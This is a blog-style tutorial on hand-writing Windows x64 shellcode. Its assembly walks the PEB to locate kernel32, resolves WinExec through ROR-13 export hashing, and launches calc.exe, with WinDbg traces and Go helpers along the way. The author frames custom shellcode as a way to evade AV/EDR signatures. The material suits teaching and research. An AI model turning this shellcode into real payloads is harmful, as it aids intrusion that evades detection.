2. Windows x64 Shellcode Development intro

#x64 #shellcode #golang #asm

Introduction

Shellcode is a small piece of machine code, usually written in assembly language, that performs a specific function in the context of a software exploit. The term "shellcode" comes from the idea that the code often opens a shell, providing an attacker with command-line access to a compromised system.

Shellcode is commonly associated with security exploits, especially in the field of cybersecurity and penetration testing. It is often injected into a vulnerable program's memory through various means, such as buffer overflows or other vulnerabilities, to take control of the program's execution flow.

The functionality of shellcode can vary widely, depending on the goals of the attacker. It might include actions like spawning a shell, downloading and executing malicious payloads, or performing other malicious activities.

It's important to note that while shellcode itself is not inherently malicious, it is commonly used as a component of exploits and attacks.

A common tool for generating shellcode is msfvenom. Payloads generated with this tool are heavily signatured by AV/EDR vendors, so being able to write custom shellcode is a great addition to the arsenal of any offensive security professional.

Assembly - Intel Syntax

Throughout this blog post I will be using Intel syntax. I think it's much easier to read and write. It's also the default syntax for WinDbg, which is the debugger I will be using to test my assembly code.

Syntax

Intel syntax follows this convention:

instruction destination, source;

So let's take a real example. The add instruction adds the value on the right to the value on the left.

add rax,1;

In this case, if rax held the value 2 before the instruction ran, it will hold the value 3 after execution.

Common ASM instructions

Instruction                   Explanation
mov rax,1;                    Moves the value 1 (decimal) into rax. Prefix the number with 0x for hex values
mov rax, qword ptr [r8];      Moves the qword stored at the address held in r8 into rax
add rax,1;                    Adds 1 to rax
sub rax,1;                    Subtracts 1 from rax
push rax;                     Pushes the value of rax onto the stack
pop rax;                      Pops the value at the top of the stack into rax
call rax;                     Calls the function at the address stored in rax
jmp rax;                      Jumps to the address stored in rax
xor rax,rax;                  Bitwise XOR of rax with itself, which zeroes rax
int3;                         Software breakpoint that breaks into the attached debugger

The above instructions are the most commonly used when we are writing shellcode. A few others will be used but they will be explained as we walk through the actual code.

Registers

The full list of registers can be found on Microsoft's website. Let's have a quick look at how some of the registers will be used within the shellcode.

Let's take rax as an example.

Register    Size
rax         64-bit register
eax         32-bit register (lower 32 bits of rax)
ax          16-bit register (lower 16 bits of eax)
ah          8-bit register (higher 8 bits of ax)
al          8-bit register (lower 8 bits of ax)

Let's take r8 as another example.

Register    Size
r8          64-bit register
r8d         32-bit register (lower 32 bits of r8)
r8w         16-bit register (lower 16 bits of r8d)
r8b         8-bit register (lower 8 bits of r8w)

d - double word
w - word
b - byte
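To make the overlap between these names concrete, here is a small Go sketch. The helper names (eax, ax, ah, al) are hypothetical; they only mask and shift a 64-bit value the way the table describes and do not read real CPU registers.

```go
package main

import "fmt"

// Hypothetical helpers: each returns one "view" of a 64-bit rax value,
// using the bit ranges from the table. No CPU state is read.
func eax(rax uint64) uint32 { return uint32(rax) }     // lower 32 bits
func ax(rax uint64) uint16  { return uint16(rax) }     // lower 16 bits
func ah(rax uint64) uint8   { return uint8(rax >> 8) } // bits 8-15 (upper byte of ax)
func al(rax uint64) uint8   { return uint8(rax) }      // lower 8 bits

func main() {
	rax := uint64(0x1122334455667788)
	fmt.Printf("eax=0x%08x ax=0x%04x ah=0x%02x al=0x%02x\n", eax(rax), ax(rax), ah(rax), al(rax))
	// prints: eax=0x55667788 ax=0x7788 ah=0x77 al=0x88
}
```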

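A few things to note when using the different variations of these registers. Let's say the following instruction is used:

mov rax, qword ptr [r8];

The source and destination must match in size: rax is a 64-bit register and qword ptr reads 64 bits. We cannot use a 64-bit register as the destination with a 32-bit (dword) source, as in mov rax, dword ptr [r8];, and Keystone will not generate the opcodes for it. To read a dword, use the 32-bit version of the register instead (for example mov ecx, dword ptr [r9 + 0x3c];), and use movzx to zero-extend a word or a byte into a larger register.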

Shellcode template

A good template I found online when I was looking for one can be found here.

I am not a big fan of Python, so I ported the above script to Go. To make development and debugging easier, the port also includes a shellcode runner that automatically launches WinDbg Preview and attaches it to the process.

The ported code can be downloaded from my GitHub page here. If you are more familiar with Python, you can use the original template from Exploit-DB and follow along. The only caveat is that you will have to write your own shellcode runner to execute the code.

Objective

With everything we have now in place, let's have a quick look at the code we are trying to execute in a higher level language.

package main

import (
	"syscall"
	"unsafe"

	"golang.org/x/sys/windows"
)

func main() {

	hModule, _ := windows.LoadLibrary("kernel32.dll")

	winexecaddr, _ := windows.GetProcAddress(hModule, "WinExec")

	calcstring, _ := syscall.BytePtrFromString("calc.exe")

	syscall.SyscallN(
		winexecaddr, 
		uintptr(unsafe.Pointer(calcstring)), 
		0x1)
}

From the above code we essentially have 4 lines of code we would like to turn into assembly.

Line 12: Load kernel32.dll

Line 14: Get the address of the exported WinExec function

Line 16: Get a pointer to the null-terminated string "calc.exe"

Line 18: Call the WinExec function, passing the pointer from line 16 as the first argument and 1 as the second.

Shellcode

Finding kernel32.dll

As mentioned previously the first step of developing our shellcode is to find the base address of kernel32.dll in memory. Kernel32.dll is always loaded in the process memory on creation.

To find the address we have to perform the following tasks.

  1. Get the address of the PEB structure from TEB

  2. From PEB we can get the PEB_LDR_DATA

  3. And from PEB_LDR_DATA we can get InMemoryOrderModuleList

  4. Walk InMemoryOrderModuleList to the kernel32.dll entry and read its DllBase

Let's walk through the assembly code in WinDbg to ensure we get the expected results. We start by adding an int3; breakpoint at the top of our shellcode.

 "find_kernel32:",
 " int3;",
 " xor rdx, rdx;",
 " mov rax, gs:[rdx+0x60];", // RAX stores the value of the ProcessEnvironmentBlock member in TEB, which is the PEB address
 " mov rsi,[rax+0x18];",     // Get the value of the Ldr member in PEB, which is the address of the _PEB_LDR_DATA structure
 " mov rsi,[rsi + 0x20];",   // RSI = InMemoryOrderModuleList.Flink, the InMemoryOrderLinks of the first entry (current executable)
 " mov r9, [rsi];",          // Follow Flink: current module is ntdll.dll
 " mov r9, [r9];",           // Follow Flink: current module is kernel32.dll
 " mov r9, [r9+0x20];",      // DllBase of kernel32.dll (entry start + 0x30)
 " jmp call_winexec;",

Get the address of the PEB structure from TEB

Line 4: On Windows x64, the gs segment register points to the Thread Environment Block (TEB), which contains information about the current thread

In Windbg we can view the structure using the following command

dt nt!_TEB @$teb

We can see that the PEB is located at offset 0x60 from the beginning of the TEB. Once we step over the following instruction we should get the address of PEB in rax

mov     rax,qword ptr gs:[rdx+60h]

A quick sanity check confirms that the value in the rax register matches the one from the TEB.

0:001> r rax
rax=00000009d0110000

From PEB we can get the PEB_LDR_DATA

Line 5: We have the value of PEB in RAX and we now try to get the address of the PEB_LDR_DATA.

We can then use the following command to view the PEB Structure and identify the offset for LDR

dt nt!_PEB 00000009d0110000

As we can see above, the offset to Ldr is 0x18. Let's step over line 5, which holds the following instruction, to see if we get the address of PEB_LDR_DATA in the RSI register

" mov rsi,[rax+0x18];"

Let's do a quick sanity check using windbg

0:001> p
0000016b`78f8000d 488b7620        mov     rsi,qword ptr [rsi+20h] ds:00007ffc`22ff6400=0000016b52262c80
0:001> r rsi
rsi=00007ffc22ff63e0

Great, we now have the address of the struct in rsi

We can get InMemoryOrderModuleList from PEB_LDR_DATA

Line 6: We now have the PEB_LDR_DATA address in rsi and we want to get the value of InMemoryOrderModuleList to rsi. Let's view the struct in windbg once again to make sure we have the correct offset in our shellcode.

The offset seems to be correct in our code

" mov rsi,[rsi + 0x20];"

Let's step over in our code to see if we get the right value in rsi.

0:001> p
0000016b`78f80011 4c8b0e          mov     r9,qword ptr [rsi] ds:0000016b`52262c80=0000016b52262ae0
0:001> r rsi
rsi=0000016b52262c80

Kernel32 comes after the current executable and ntdll. So moving forward twice should give us the _LDR_DATA_TABLE_ENTRY of kernel32. Let's confirm this.

First Entry ks.exe:

dt _LDR_DATA_TABLE_ENTRY 0x16b52262c80-0x10

Second entry ntdll.dll

Third entry kernel32.dll

We can see that DllBase is at offset 0x30 from the beginning of the structure. However, r9 does not point at the beginning of the entry: each Flink points to the InMemoryOrderLinks member, which sits at offset 0x10 (that is why we subtracted 0x10 in the dt commands above). So we only need to add 0x20 to r9 to reach DllBase.

" mov r9, [r9+0x20];",      

Let's confirm that after stepping over line 9 in our code the register r9 will hold the kernel32.dll base address.

Awesome. With the address of kernel32 in r9 we can now proceed to get the address of WinExec.
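The pointer chain can be modelled in Go to double-check the offsets. This is a sketch under obvious assumptions: memory is a toy map from address to qword, every address in sampleMemory is made up, and the names (thirdModuleBase, sampleMemory) are hypothetical. It does not read a real TEB or PEB; it only follows the same offsets as find_kernel32 (0x60, 0x18, 0x20, two Flinks, then DllBase).

```go
package main

import "fmt"

// Offsets used by find_kernel32 on x64 (as seen with dt in WinDbg).
const (
	tebPEB          = 0x60 // _TEB.ProcessEnvironmentBlock
	pebLdr          = 0x18 // _PEB.Ldr
	ldrInMemOrder   = 0x20 // _PEB_LDR_DATA.InMemoryOrderModuleList
	entryInMemLinks = 0x10 // _LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks
	entryDllBase    = 0x30 // _LDR_DATA_TABLE_ENTRY.DllBase
)

// memory is a toy model of the address space: address -> qword stored there.
type memory map[uint64]uint64

// thirdModuleBase follows the same pointer chain as the assembly stub.
func thirdModuleBase(mem memory, teb uint64) uint64 {
	peb := mem[teb+tebPEB]
	ldr := mem[peb+pebLdr]
	links := mem[ldr+ldrInMemOrder] // Flink -> entry 1 (current executable)
	links = mem[links]              // Flink -> entry 2 (ntdll.dll)
	links = mem[links]              // Flink -> entry 3 (kernel32.dll)
	// links points 0x10 bytes into the entry, so DllBase is at links + 0x20.
	return mem[links-entryInMemLinks+entryDllBase]
}

// sampleMemory builds a hypothetical layout; every address is made up.
func sampleMemory() (memory, uint64) {
	const teb, peb, ldr = 0x1000, 0x2000, 0x3000
	const exe, ntdll, k32 = 0x4000, 0x5000, 0x6000 // start of each entry
	mem := memory{
		teb + tebPEB:            peb,
		peb + pebLdr:            ldr,
		ldr + ldrInMemOrder:     exe + entryInMemLinks,
		exe + entryInMemLinks:   ntdll + entryInMemLinks,
		ntdll + entryInMemLinks: k32 + entryInMemLinks,
		k32 + entryDllBase:      0x7ffc21270000,
	}
	return mem, teb
}

func main() {
	mem, teb := sampleMemory()
	fmt.Printf("kernel32 base: 0x%x\n", thirdModuleBase(mem, teb))
}
```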

GetProcAddress

The next step in our shellcode is to create a function that walks the export directory of any given DLL (identified by its base address) and returns the absolute address of the requested function. Although in this example we only call it once, in larger, real-world scenarios we will most likely have to call it multiple times.

"parse_module:",                    // Parsing DLL file in memory
" mov ecx, dword ptr [r9 + 0x3c];", // R9 stores  the base address of the module, get the NT header offset
" xor r15, r15;",
" mov r15b, 0x88;", // Offset to Export Directory
" add r15, r9;",
" add r15, rcx;",
" mov r15d, dword ptr [r15];",        // Get the RVA of the export directory
" add r15, r9;",                      // R15 stores  the VMA of the export directory
" mov ecx, dword ptr [r15 + 0x18];",  // ECX stores  the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];", // Get the RVA of ENPT
" add r14, r9;",                      // R14 stores  the VMA of ENPT

"search_function:",  // Search for a given function
" jrcxz not_found;", // If RCX is 0, the given function is not found
" dec ecx;",         // Decrease index by 1
" xor rsi, rsi;",
" mov esi, [r14 + rcx*4];", // RVA of function name string
" add rsi, r9;",            // RSI points to function name string

"function_hashing:", // Hash function name function
" xor rax, rax;",
" xor rdx, rdx;",
" cld;", // Clear DF flag

"iteration:",        // Iterate over each byte
" lodsb;",           // Copy the next byte of RSI to Al
" test al, al;",     // If reaching the end of the string
" jz compare_hash;", // Compare hash
" ror edx, 0x0d;",   // Part of hash algorithm
" add edx, eax;",    // Part of hash algorithm
" jmp iteration;",   // Next byte

"compare_hash:", // Compare hash
" cmp edx, r8d;",
" jnz search_function;",               // If not equal, search the previous function (index decreases)
" mov r10d, [r15 + 0x24];",            // Ordinal table RVA
" add r10, r9;",                       // Ordinal table VMA
" movzx ecx, word ptr [r10 + 2*rcx];", // Ordinal value -1
" mov r11d, [r15 + 0x1c];",            // RVA of EAT
" add r11, r9;",                       // VMA of EAT
" mov eax, [r11 + 4*rcx];",            // RAX stores  RVA of the function
" add rax, r9;",                       // RAX stores  VMA of the function
" ret;",
"not_found:",
" ret;",

Let's break the code down into smaller pieces to understand exactly what's happening.

parse_module

"parse_module:",                    // Parsing DLL file in memory
" mov ecx, dword ptr [r9 + 0x3c];", // R9 stores  the base address of the module, get the NT header offset
" xor r15, r15;",
" mov r15b, 0x88;", // Offset to Export Directory
" add r15, r9;",
" add r15, rcx;",
" mov r15d, dword ptr [r15];",        // Get the RVA of the export directory
" add r15, r9;",                      // R15 stores  the VMA of the export directory
" mov ecx, dword ptr [r15 + 0x18];",  // ECX stores  the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];", // Get the RVA of ENPT
" add r14, r9;",                      // R14 stores  the VMA of ENPT

The parse_module function expects 2 values from the caller:

  • R9 -> should hold the base address of the dll

  • R8d -> should have the hash of the function (more on this later)

Line 2: The e_lfanew field at offset 0x3c of the DOS header, which holds the offset to the beginning of the NT headers, is moved to ecx

PE-bear is an excellent tool that can be used to cross check if the values we see in windbg are indeed the right ones.

Let's step over the code in line 2 to make sure we are getting the correct result. The value we expect to see in ecx is E8.

0:010> t
000001f8`6d17001d 418b493c        mov     ecx,dword ptr [r9+3Ch] ds:00007ffc`2127003c=000000e8
0:010> p
000001f8`6d170021 4d31ff          xor     r15,r15
0:010> r ecx
ecx=e8

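Lines 3-7: These lines compute the address below and then read the 32-bit value stored there:

NtHeader = DllBase + 0xE8

ExportDirectoryEntry = NtHeader + 0x88

In a 64-bit (PE32+) image, 0x88 is the offset from the start of the NT headers to the first DataDirectory entry, which holds the RVA of the export directory.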

0:010> ?e8+0x88
Evaluate expression: 368 = 00000000`00000170

From a quick calculation we can see that this entry is at offset 0x170 from the base address. Let's check in PE-bear whether that offset points to the export directory.

We can see that the offset 0x170 points to the RVA of the export directory.
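Where does 0x88 come from? In a PE32+ image the NT headers start with the 4-byte PE signature, followed by the 20-byte file header and the optional header, whose last field is the 16-entry DataDirectory array; entry 0 is the export directory. The sketch below derives the offset from the structure sizes in Go's standard debug/pe package; the function name exportEntryOffset is my own.

```go
package main

import (
	"debug/pe"
	"encoding/binary"
	"fmt"
)

// exportEntryOffset returns the offset from the image base of
// DataDirectory[0].VirtualAddress (the export directory RVA) in a PE32+ image.
func exportEntryOffset(eLfanew uint32) uint32 {
	const signature = 4                               // "PE\0\0"
	fileHeader := binary.Size(pe.FileHeader{})       // 20 bytes
	optHeader := binary.Size(pe.OptionalHeader64{})  // 240 bytes
	dataDirs := 16 * binary.Size(pe.DataDirectory{}) // 16 entries of 8 bytes at the end
	return eLfanew + uint32(signature+fileHeader+optHeader-dataDirs)
}

func main() {
	fmt.Printf("from NT headers: 0x%x\n", exportEntryOffset(0))                  // 0x88
	fmt.Printf("kernel32 (e_lfanew = 0xe8): 0x%x\n", exportEntryOffset(0xe8)) // 0x170
}
```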

Let's step over the following instruction in WinDbg to ensure that r15 holds the RVA value we expect to see

" mov r15d, dword ptr [r15];",   

When we move a dword into the lower 32 bits of a register (for example r15d), the upper 32 bits are filled with 0s.

This is not the case when we move a value into the lower 16 or 8 bits of the register: the remaining upper bits are left unchanged.

0:010> r r15
r15=000000000009e750
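The difference between 32-bit writes and 16/8-bit writes is also why parse_module zeroes r15 with xor r15, r15; before mov r15b, 0x88;. A minimal Go model of the three cases (the writeR* helpers are hypothetical and operate on a uint64 standing in for the register):

```go
package main

import "fmt"

// writeR32: a 32-bit destination (e.g. r15d) zero-extends into the full register.
func writeR32(_ uint64, v uint32) uint64 { return uint64(v) }

// writeR16: a 16-bit destination (e.g. r15w) leaves bits 16-63 unchanged.
func writeR16(reg uint64, v uint16) uint64 { return reg&^0xffff | uint64(v) }

// writeR8: an 8-bit destination (e.g. r15b) leaves bits 8-63 unchanged.
func writeR8(reg uint64, v uint8) uint64 { return reg&^0xff | uint64(v) }

func main() {
	r15 := ^uint64(0) // pretend r15 holds leftover garbage: all bits set
	fmt.Printf("mov r15d: 0x%016x\n", writeR32(r15, 0x9e750)) // 0x000000000009e750
	fmt.Printf("mov r15w: 0x%016x\n", writeR16(r15, 0xe750))  // 0xffffffffffffe750
	fmt.Printf("mov r15b: 0x%016x\n", writeR8(r15, 0x88))     // 0xffffffffffffff88
}
```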

We can now add r9 which holds the dllBase address to calculate the absolute address of the Export directory.

" add r15, r9;",        

In windbg we can confirm that we are indeed pointing to the right location by viewing the first two double words.

0:010> r r15; dd r15 L2
r15=00007ffc2130e750
00007ffc`2130e750  00000000 2e35230e

We can see the value of Characteristics (00000000) and ReproChecksum (2e35230e)

" mov ecx, dword ptr [r15 + 0x18];",  // ECX stores  the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];", // Get the RVA of ENPT
" add r14, r9;",                      // R14 stores  the VMA of ENPT

The last 3 lines store the number of function names in ecx and the absolute address of the export name pointer table (AddressOfNames, ENPT in the comments) in r14.

0:010> r ecx
ecx=687
0:010> dd r14
00007ffc`21310194  000a28cb 000a2904 000a2937 000a2946
00007ffc`213101a4  000a295b 000a2980 000a2989 000a2992
00007ffc`213101b4  000a29a3 000a29b4 000a29f9 000a2a1f

A quick look in PE-bear reveals that we have the right values in both ecx and r14: the first value at r14 is the same as the first Name RVA listed in PE-bear.
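The offsets parse_module and compare_hash read from the export directory (0x18, 0x1c, 0x20 and 0x24) are fields of the IMAGE_EXPORT_DIRECTORY structure. As a sketch, the Go type below mirrors its 40-byte layout so it can be decoded with encoding/binary; the type and function names are my own, and the sample buffer in main only reuses two values from the WinDbg session (NumberOfNames and the AddressOfNameOrdinals RVA).

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
)

// imageExportDirectory mirrors IMAGE_EXPORT_DIRECTORY (40 bytes, little-endian).
// The offset of each field is noted next to it.
type imageExportDirectory struct {
	Characteristics       uint32 // 0x00
	TimeDateStamp         uint32 // 0x04
	MajorVersion          uint16 // 0x08
	MinorVersion          uint16 // 0x0a
	Name                  uint32 // 0x0c, RVA of the DLL name
	Base                  uint32 // 0x10, first ordinal
	NumberOfFunctions     uint32 // 0x14
	NumberOfNames         uint32 // 0x18, loaded into ecx
	AddressOfFunctions    uint32 // 0x1c, RVA of the EAT (r11)
	AddressOfNames        uint32 // 0x20, RVA of the ENPT (r14)
	AddressOfNameOrdinals uint32 // 0x24, RVA of the ordinal table (r10)
}

// parseExportDirectory decodes the structure from raw bytes.
func parseExportDirectory(raw []byte) (imageExportDirectory, error) {
	var d imageExportDirectory
	err := binary.Read(bytes.NewReader(raw), binary.LittleEndian, &d)
	return d, err
}

func main() {
	raw := make([]byte, 40)
	binary.LittleEndian.PutUint32(raw[0x18:], 0x687)   // NumberOfNames (ecx in WinDbg)
	binary.LittleEndian.PutUint32(raw[0x24:], 0xa1bb0) // AddressOfNameOrdinals RVA (r10 in WinDbg)
	d, err := parseExportDirectory(raw)
	if err != nil {
		panic(err)
	}
	fmt.Printf("size=%d NumberOfNames=0x%x AddressOfNameOrdinals=0x%x\n",
		binary.Size(d), d.NumberOfNames, d.AddressOfNameOrdinals)
}
```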

search_function

"search_function:",  // Search for a given function
" jrcxz not_found;", // If RCX is 0, the given function is not found
" dec ecx;",         // Decrease index by 1
" xor rsi, rsi;",
" mov esi, [r14 + rcx*4];", // RVA of function name string
" add rsi, r9;",            // RSI points to function name string
.
.
.
"not_found:",
" ret;",

The functionality of this code is fairly simple.

Line 2: jrcxz checks whether rcx is 0 and, if it is, jumps to not_found (line 10), which returns to the caller. A value of 0 means the loop went through the whole name table without finding the requested function; in that case rax does not hold a valid function address.

Line 3: Decrements ecx by 1 on every iteration, so the name table is searched from the last entry to the first

Line 4: Zeroes rsi

Line 5: Moves the RVA of the name at index ecx into esi; on the first iteration this is the last entry of the name table

Line 6: Adds the base address to the RVA to get the absolute address of the name string in rsi

The second time the loop reaches this point this is the output from Windbg

000001f8`6d170049 4c01ce          add     rsi,r9
0:010> r rsi
rsi=00000000000ad02a
0:010> p
000001f8`6d17004c 4831c0          xor     rax,rax
0:010> db rsi
00007ffc`2131d02a  75 61 77 5f 77 63 73 6c-65 6e 00 75 61 77 5f 77  uaw_wcslen.uaw_w
00007ffc`2131d03a  63 73 72 63 68 72 00 00-00 00 f0 f0 0a 00 00 00  csrchr..........

It matches the exported functions from PE-bear

function_hashing

The template uses a well-known technique: instead of comparing function names as strings, it computes a hash of each exported name (a ROR-13 hash) and compares it with the hash we provide. This keeps the name strings out of the shellcode, but the catch is that we have to write a piece of code to calculate that hash for us.

"function_hashing:", // Hash function name function
" xor rax, rax;",
" xor rdx, rdx;",
" cld;", // Clear DF flag

"iteration:",        // Iterate over each byte
" lodsb;",           // Copy the next byte of RSI to Al
" test al, al;",     // If reaching the end of the string
" jz compare_hash;", // Compare hash
" ror edx, 0x0d;",   // Part of hash algorithm
" add edx, eax;",    // Part of hash algorithm
" jmp iteration;",   // Next byte

Lines 1-4: Zero rax and rdx and clear the direction flag (DF) so that lodsb moves forward through the string

The iteration code is where the hashing happens.

Line 7: lodsb loads the byte at the address in rsi into the lowest byte of rax (al) and increments rsi

Lines 8-9: Check whether the byte is 0, which marks the end of the string, and if so jump to compare_hash

Line 10: The x86-64 assembly instruction ror edx, 0x0d performs a "rotate right" operation on the contents of the edx register. In this case, the rotation is by 13 bits (0x0d in hexadecimal is 13 in decimal).

Imagine edx could only hold 4 bits. Here is an example of the ror effect after rotating right 1 bit.

edx =  0101
ror edx, 0x01
edx= 1010

Line 11: Adds eax to edx

Line 12: Loops to the next byte
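In Go, the same rotation is available through math/bits, which only provides a left rotation; rotating left by a negative count rotates right. The sketch below (helper names are my own) reproduces the 4-bit example above and the 32-bit ror edx, 0x0d; applied to the first character of "WinExec".

```go
package main

import (
	"fmt"
	"math/bits"
)

// ror32 rotates x right by k bits, like `ror` on a 32-bit register.
func ror32(x uint32, k int) uint32 {
	return bits.RotateLeft32(x, -k)
}

// ror4 is the toy 4-bit register from the example above.
func ror4(x uint8, k uint) uint8 {
	x &= 0xf
	k %= 4
	return (x>>k | x<<(4-k)) & 0xf
}

func main() {
	fmt.Printf("ror4(0101, 1) = %04b\n", ror4(0b0101, 1)) // 1010
	// The bits shifted out on the right reappear on the left.
	x := uint32(0x57) // 'W', the first byte of "WinExec"
	fmt.Printf("ror32(0x%x, 13) = 0x%08x\n", x, ror32(x, 13)) // 0x02b80000
	fmt.Println(ror32(x, 13) == x>>13|x<<19)                  // true
}
```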

compare_hash

"compare_hash:", // Compare hash
" cmp edx, r8d;",
" jnz search_function;",               // If not equal, search the previous function (index decreases)
" mov r10d, [r15 + 0x24];",            // Ordinal table RVA
" add r10, r9;",                       // Ordinal table VMA
" movzx ecx, word ptr [r10 + 2*rcx];", // Ordinal value -1
" mov r11d, [r15 + 0x1c];",            // RVA of EAT
" add r11, r9;",                       // VMA of EAT
" mov eax, [r11 + 4*rcx];",            // RAX stores  RVA of the function
" add rax, r9;",                       // RAX stores  VMA of the function
" ret;",

The last part of the code is where the actual comparison takes place with the provided hash. Our hash will be located in r8d.

Line 2: Compares calculated hash from the previous function with the one we provided

Line 3: If they are not equal it jumps back to our search_function loop to get the next entry.

Lines 4-10 only execute if the provided and calculated hashes match

Line 4: r15 holds the address of the export directory. The offset 0x24 points to the AddressOfNameOrdinals

000001f8`6d170064 458b5724        mov     r10d,dword ptr [r15+24h] ds:00007ffc`2130e774=000a1bb0
0:010> p
000001f8`6d170068 4d01ca          add     r10,r9
0:010> r r10
r10=00000000000a1bb0

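Line 5: Adds the base address to the RVA to get the absolute address of the AddressOfNameOrdinals table

Line 6: Reads the 16-bit entry at index rcx of AddressOfNameOrdinals into ecx. This value is not the ordinal itself but an index into the export address table, equal to the function's ordinal minus the export directory's Base

0:010> r ecx
ecx=638

At first glance 0x638 looks like the ordinal of WideCharToMultiByte, but ordinals include the Base (1 in this case). Index 0x638 therefore corresponds to ordinal 0x639, which is the ordinal of WinExec.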

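Lines 7-8: Get the absolute address of the export address table (AddressOfFunctions), which holds the RVAs of the exported functions. That's where the address we need to call the function comes from.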

Line 9: Gets the RVA of the address of function for WinExec in eax

0:010> r eax
eax=68660

Comparing with the previous screenshot we can see that it's a match

Line 10: We add the base address and we have the function in the rax register ready to be called as needed.
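To tie parse_module, search_function, function_hashing and compare_hash together, here is a sketch of the same lookup in Go, operating on a byte slice instead of live memory. Assumptions: the slice is a hypothetical, hand-built PE32+ image in which slice offsets equal RVAs (as in a loaded module), and resolveByHash, ror13Hash, cString and buildSyntheticImage are names I made up. The value read from AddressOfNameOrdinals is used directly as an index into AddressOfFunctions, exactly as movzx ecx, word ptr [r10 + 2*rcx]; does.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"math/bits"
)

// ror13Hash computes the same hash as function_hashing: for each byte,
// rotate the running value right by 13 bits, then add the byte.
func ror13Hash(name []byte) uint32 {
	var h uint32
	for _, c := range name {
		h = bits.RotateLeft32(h, -13)
		h += uint32(c)
	}
	return h
}

// cString returns the null-terminated string that starts at rva.
func cString(image []byte, rva uint32) []byte {
	s := image[rva:]
	if end := bytes.IndexByte(s, 0); end >= 0 {
		s = s[:end]
	}
	return s
}

// resolveByHash mirrors parse_module, search_function and compare_hash.
// It returns the RVA of the export whose name hashes to want.
func resolveByHash(image []byte, want uint32) (uint32, bool) {
	le := binary.LittleEndian
	nt := le.Uint32(image[0x3c:])           // e_lfanew
	exp := le.Uint32(image[nt+0x88:])       // export directory RVA (PE32+)
	numNames := le.Uint32(image[exp+0x18:]) // NumberOfNames
	eat := le.Uint32(image[exp+0x1c:])      // AddressOfFunctions
	names := le.Uint32(image[exp+0x20:])    // AddressOfNames
	ords := le.Uint32(image[exp+0x24:])     // AddressOfNameOrdinals
	for i := numNames; i > 0; {
		i-- // walk the name table backwards, like `dec ecx`
		nameRVA := le.Uint32(image[names+4*i:])
		if ror13Hash(cString(image, nameRVA)) != want {
			continue
		}
		idx := uint32(le.Uint16(image[ords+2*i:])) // index into the EAT
		return le.Uint32(image[eat+4*idx:]), true
	}
	return 0, false
}

// buildSyntheticImage lays out a tiny, made-up image that exports two names.
func buildSyntheticImage() []byte {
	img := make([]byte, 0x200)
	le := binary.LittleEndian
	le.PutUint32(img[0x3c:], 0x40)       // e_lfanew
	le.PutUint32(img[0x40+0x88:], 0x100) // export directory RVA
	le.PutUint32(img[0x118:], 2)         // NumberOfNames
	le.PutUint32(img[0x11c:], 0x140)     // AddressOfFunctions
	le.PutUint32(img[0x120:], 0x150)     // AddressOfNames
	le.PutUint32(img[0x124:], 0x160)     // AddressOfNameOrdinals
	le.PutUint32(img[0x140:], 0x1000)    // EAT[0]
	le.PutUint32(img[0x144:], 0x2000)    // EAT[1]
	le.PutUint32(img[0x150:], 0x170)     // name RVA 0
	le.PutUint32(img[0x154:], 0x190)     // name RVA 1
	le.PutUint16(img[0x160:], 0)         // EAT index for name 0
	le.PutUint16(img[0x162:], 1)         // EAT index for name 1
	copy(img[0x170:], "WideCharToMultiByte")
	copy(img[0x190:], "WinExec")
	return img
}

func main() {
	rva, ok := resolveByHash(buildSyntheticImage(), 0xe8afe98) // WinExec hash
	fmt.Printf("found=%v rva=0x%x\n", ok, rva)
}
```

In the synthetic image WinExec is the last of the two names, so the backwards walk reaches it on the first iteration, just as the assembly would.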

Helper code for hash calculation

If you made it to this point, you are probably wondering how to calculate the hash and provide it to the assembly code.

The following code will calculate and print the hash for us:

package main

import (
	"fmt"
	"math/bits"
)

func main() {
	funcName := "WinExec"
	fmt.Printf("Function Name: %s , Function Hash: 0x%x\n", funcName, HashCalculator(funcName))
}

// HashCalculator reproduces the hash computed by function_hashing:
// for every byte of the name, rotate the running hash right by 13 bits and add the byte.
func HashCalculator(funcName string) uint32 {
	var hash uint32
	for _, b := range []byte(funcName) {
		hash = bits.RotateLeft32(hash, -0x0d) // a negative count rotates right
		hash += uint32(b)
	}
	return hash
}

Call the WinExec function

"call_winexec:",
"    mov r8d, 0xe8afe98;", // WinExec Hash
"    call parse_module;",  // Search and obtain address of WinExec
"    xor rcx, rcx;",
"    push rcx;",                    // \0
"    mov rcx, 0x6578652e636c6163;", // exe.clac
"    push rcx;",
"    lea rcx, [rsp];", // Address of the string as the 1st argument lpCmdLine
"    xor rdx,rdx;",
"    inc rdx;", // uCmdShow=1 as the 2nd argument
"    sub rsp, 0x28;",
"    call rax;", // WinExec

We now reach the end of our code.

Referring back to the original go code we need to get a pointer to a null terminated string, in this example a pointer to 'calc.exe' and then call the function.

Line 2: We can use the helper code to calculate the function hash:

Function Name: WinExec , Function Hash: 0xe8afe98

We then feed the value to r8d.

Line 3: We call the parse_module function. If everything went well, rax will hold the address of the function

Great, we now only have to pass the arguments to the function.

It's a good place to pause and have a quick look at the x64 calling convention. When calling a function on x64 Windows, the first four integer or pointer arguments go in the registers rcx, rdx, r8 and r9, and the rest go on the stack from right to left, so the last argument is pushed first and so on. The caller must also reserve 32 bytes of shadow space for the four register arguments and keep rsp 16-byte aligned at the call instruction.

A great source of information is Microsoft's website.

With this knowledge let's pass the arguments to WinExec.

UINT WinExec(
  [in] LPCSTR lpCmdLine,
  [in] UINT   uCmdShow
);

So the WinExec definition from Microsoft states that the first argument should be a pointer to the null-terminated command line, and the second, uCmdShow, controls how the window is displayed (1 is SW_SHOWNORMAL).

Lines 4-8:

Line 4: zero -> rcx

Line 5: push 0 to the stack. This will act as the null termination

Line 6: The hex values of calc.exe are moved to rcx

To convert ascii to hex I am using this online converter https://www.rapidtables.com/convert/number/ascii-to-hex.html

calc.exe = 63 61 6C 63 2E 65 78 65 + 00

"    mov rcx, 0x6578652e636c6163;", // exe.clac

Be careful with the byte order: x64 is little-endian, so when the register is pushed, its least significant byte ends up at the lowest address. That is why the characters are written into the register in reverse order, as shown above.

Also, a register can only hold 8 bytes, so if the string is longer we need to repeat this process, pushing the last 8-byte chunk first, until the whole string is on the stack.

Line 7: Pushes the string to the stack

Line 8: Get a pointer to the string in the rcx register (first argument)

Lines 9-10: Zero rdx and increment it by 1 (second argument)

